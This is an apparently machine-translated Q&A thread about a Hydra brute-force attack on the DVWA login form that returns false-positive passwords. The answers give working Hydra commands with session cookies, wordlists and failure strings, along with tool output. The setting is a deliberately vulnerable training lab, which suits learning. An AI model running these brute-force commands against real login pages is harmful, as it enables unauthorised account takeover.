it-swarm-eu.dev

Perché Hydra restituisce 16 password valide quando nessuna è valida?

Ho giocato con Hydra e DVWA e ho colpito un po 'di difficoltà - Hydra risponde facendomi sapere che le prime 16 password nel mio l'elenco delle password è corretto quando nessuno di essi lo è.

Presumo che si tratti di un errore di sintassi, ma non sono sicuro che qualcuno l'abbia mai visto prima. Ho seguito diversi tutorial senza fortuna, quindi spero che qualcuno possa aiutare.

Sintassi:

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Produzione

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] Host: 192.168.88.196   login: admin   password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] Host: 192.168.88.196   login: admin   password: adrian
[80][www-form] Host: 192.168.88.196   login: admin   password: aerobics
[80][www-form] Host: 192.168.88.196   login: admin   password: academic
[80][www-form] Host: 192.168.88.196   login: admin   password: access
[80][www-form] Host: 192.168.88.196   login: admin   password: abc
[80][www-form] Host: 192.168.88.196   login: admin   password: admin
[80][www-form] Host: 192.168.88.196   login: admin   password: academia
[80][www-form] Host: 192.168.88.196   login: admin   password: albatross
[80][www-form] Host: 192.168.88.196   login: admin   password: alex
[80][www-form] Host: 192.168.88.196   login: admin   password: airplane
[80][www-form] Host: 192.168.88.196   login: admin   password: albany
[80][www-form] Host: 192.168.88.196   login: admin   password: ada
[80][www-form] Host: 192.168.88.196   login: admin   password: aaa
[80][www-form] Host: 192.168.88.196   login: admin   password: albert
[80][www-form] Host: 192.168.88.196   login: admin   password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-05 22:30:51

[~ ~ #] modifica [~ ~ #]

Ho avuto successo nel forzare brutalmente le credenziali di amministratore. Dopo aver effettuato l'autenticazione su DVWA, dovevo trovare le informazioni sui cookie (facilmente eseguibili tramite il browser o Burp Suite). Una volta ottenute le informazioni sui cookie, ho emesso il seguente comando che ha funzionato.

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"
26
DKNUCKLES

Lo stesso problema mi è successo mentre giocavo con DVWA. Il motivo è che stai provando a forzare la forza YOUR_SERVER/dvwa/vulnerabilities/brute/index.php che necessita di autenticazione. Prova a visitare quella pagina nel tuo browser e ti verrà chiesto di inserire un nome utente e una password (modulo diverso da quello che stai cercando di forzare)

Quindi, mentre stai cercando di forzare questo:
hydra-brute-force

Hydra in realtà sta "vedendo" questo:
hydra-login

Nel secondo modulo non verrà visualizzato il messaggio "Nome utente e/o password errati.", che hai detto a Hydra di utilizzare per distinguere tra accessi non riusciti e riusciti. Hydra non vede quel messaggio di accesso fallito, quindi si presume che l'accesso abbia avuto successo.

Quindi è necessario accedere utilizzando un browser, ottenere il cookie di sessione (per impostazione predefinita, PHPSESSID) e inviarlo a Hydra e quindi Hydra sarà in grado di "vedere" il primo modulo.

Presumibilmente, puoi impostare il cookie nelle intestazioni HTTP in Hydra facendo H=Cookie:NAME=VALUE o puntando Hydra su un file che imposta il cookie facendo C=/path/to/file. Sfortunatamente, nessuna di queste ha funzionato per me.

Dopo essere stato frustrato, ho finito per commentare la riga: 5 (dvwaPageStartup) nel file /dvwa/vulnerabilities/brute/index.php, che ha consentito a Hydra di visualizzare il modulo di accesso effettivo vulnerabile.

25
Adi

Questo è ciò che ha funzionato per me:

hydra 192.168.56.2 -l admin -P /home/user/Downloads/pass.txt http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=n5ggv5f2b3vcrl9fe15nqu6v95"

4
enigma

Sembra che Hydra sia molto spietata quando si tratta di sintassi. È possibile utilizzare il formato "URL like" per specificare il modulo, l'host e il percorso.

Mi ci è voluto un po 'per arrivarci, ma questo è ciò che ha funzionato per me (hackme è l'host):

hydra -V -l smithy -P /usr/share/wordlists/rockyou.txt "http-get-form://hackme/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Modifica aprile 2015

Sembra che lo abbiano cambiato e il formato sopra non funziona più. Tuttavia, questo è accettato:

hydra hackme -V -l smithy -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Il gotcha per cui mi sono innamorato è stato passare così tanto tempo nel debug che il mio PHP ID sessione era scaduto. Una volta aggiornato questo ha iniziato a funzionare.

L'altro gotcha era quando stavo eseguendo il debug usando Wireshark: stavo prendendo la prima richiesta HTTP e mi chiedevo perché i parametri di nome utente e password non fossero stati passati. Sembra che Hydra invii prima una richiesta HTTP all'URL senza parametri.

3
SilverlightFox